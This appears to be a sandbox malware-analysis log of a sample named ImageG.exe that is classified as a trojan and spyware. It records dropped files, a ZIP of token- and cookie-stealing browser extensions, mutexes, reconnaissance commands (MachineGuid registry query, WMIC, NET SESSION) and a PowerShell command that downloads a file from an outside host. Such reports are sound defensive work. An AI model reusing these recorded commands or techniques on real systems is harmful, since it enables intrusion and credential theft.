        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61018
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54172
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58893
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59864
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58411
        Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 54140 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58430 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61253
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62104
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50414
        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58379 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 65009 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62104 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59106
        Source: unknownNetwork traffic detected: HTTP traffic on port 58407 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58019
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60576
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58388
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58387
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55430
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58389
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58384
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58383
        Source: unknownNetwork traffic detected: HTTP traffic on port 62941 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58385 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58386
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58385
        Source: unknownNetwork traffic detected: HTTP traffic on port 58391 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58380
        Source: unknownNetwork traffic detected: HTTP traffic on port 58731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58382
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58381
        Source: unknownNetwork traffic detected: HTTP traffic on port 58416 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58433 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62568 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64272
        Source: unknownNetwork traffic detected: HTTP traffic on port 55419 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52960
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52286
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52287
        Source: unknownNetwork traffic detected: HTTP traffic on port 58422 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 61750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58399
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58398
        Source: unknownNetwork traffic detected: HTTP traffic on port 58401 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58394
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58397
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58391
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58390
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58393
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58392
        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 63379 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65238
        Source: unknownNetwork traffic detected: HTTP traffic on port 58411 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65375
        Source: unknownNetwork traffic detected: HTTP traffic on port 55430 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 62825 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58428 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 54172 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58397 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65009
        Source: unknownNetwork traffic detected: HTTP traffic on port 60089 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49598
        Source: unknownNetwork traffic detected: HTTP traffic on port 58380 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58374 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58406 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58731
        Source: unknownNetwork traffic detected: HTTP traffic on port 57341 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61691
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61577
        Source: unknownNetwork traffic detected: HTTP traffic on port 58417 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 58434 -> 443
        Source: unknownHTTPS traffic detected: 104.16.40.101:443 -> 192.168.11.20:49771 version: TLS 1.2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS
        Source: powershell.exeProcess created: 60
        Source: reg.exeProcess created: 53
        Source: conhost.exeProcess created: 71
        Source: cmd.exeProcess created: 78

        System Summary

        barindex
        Drops large PE files
        Source: C:\Users\user\Desktop\ImageG.exeFile dump: ImageG.exe.0.dr 172695040Jump to dropped file
        Source: C:\Users\user\Desktop\ImageG.exeFile dump: ImageG.exe0.0.dr 172695040Jump to dropped file
        Found suspicious ZIP file
        Source: extensions.zip.2.drZip Entry: extension-tokens/js/background.js
        Source: extensions.zip.2.drZip Entry: extension-tokens/js/bg_obf.js
        Source: extensions.zip.2.drZip Entry: extension-tokens/js/jquery-3.5.1.min.js
        Source: extensions.zip.2.drZip Entry: extension-cookies/scripts/background.js
        Initial sample is a PE file and has a suspicious name
        Source: initial sampleStatic PE information: Filename: ImageG.exe
        Source: C:\Users\user\Desktop\ImageG.exeProcess token adjusted: SecurityJump to behavior
        Source: libEGL.dll.0.drStatic PE information: Number of sections : 11 > 10
        Source: libGLESv2.dll.0.drStatic PE information: Number of sections : 11 > 10
        Source: vulkan-1.dll.0.drStatic PE information: Number of sections : 11 > 10
        Source: ImageG.exe.0.drStatic PE information: Number of sections : 15 > 10
        Source: vk_swiftshader.dll.0.drStatic PE information: Number of sections : 11 > 10
        Source: ImageG.exe0.0.drStatic PE information: Number of sections : 15 > 10
        Source: ImageG.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
        Source: classification engineClassification label: mal100.phis.troj.adwa.spyw.evad.winEXE@325/252@27/26
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Program Files\Windows NT\TableTextService\ImageG.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile created: C:\Users\user\AppData\Roaming\desenamoreisJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9704:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1128:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8788:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10104:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3380:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1620:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8688:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8360:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5128:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8576:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8712:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9592:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8624:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9788:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8712:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9960:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8408:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9404:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3520:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8256:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9536:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9544:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3380:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8624:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9788:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1620:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8788:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8464:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10056:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9064:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3484:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10108:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3196:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3520:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6412:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8688:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10232:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6412:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9540:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8436:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8368:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9424:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8436:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3196:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9352:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9260:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9856:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9960:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2220:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9704:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5128:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8576:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9928:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9424:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10056:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8464:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8408:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9352:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3544:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8368:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9540:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8256:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9544:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9592:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1128:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9404:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9452:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9664:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10232:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9584:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8360:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2220:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9536:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10104:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9664:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9260:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9856:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3544:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3484:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9452:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10108:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9584:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9928:304:WilStaging_02
        Source: C:\Users\user\Desktop\ImageG.exeFile created: C:\Users\user\AppData\Local\Temp\nscB204.tmpJump to behavior
        Source: ImageG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ExecutablePath FROM Win32_Process WHERE processid=7896
        Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 9048)
        Source: C:\Users\user\Desktop\ImageG.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\Desktop\ImageG.exeFile read: C:\Users\user\Desktop\ImageG.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\ImageG.exe "C:\Users\user\Desktop\ImageG.exe"
        Source: C:\Users\user\Desktop\ImageG.exeProcess created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=7896 get ExecutablePath"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process where processid=7896 get ExecutablePath
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\desenamoreis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1696 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "NET SESSION"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe NET SESSION
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 SESSION
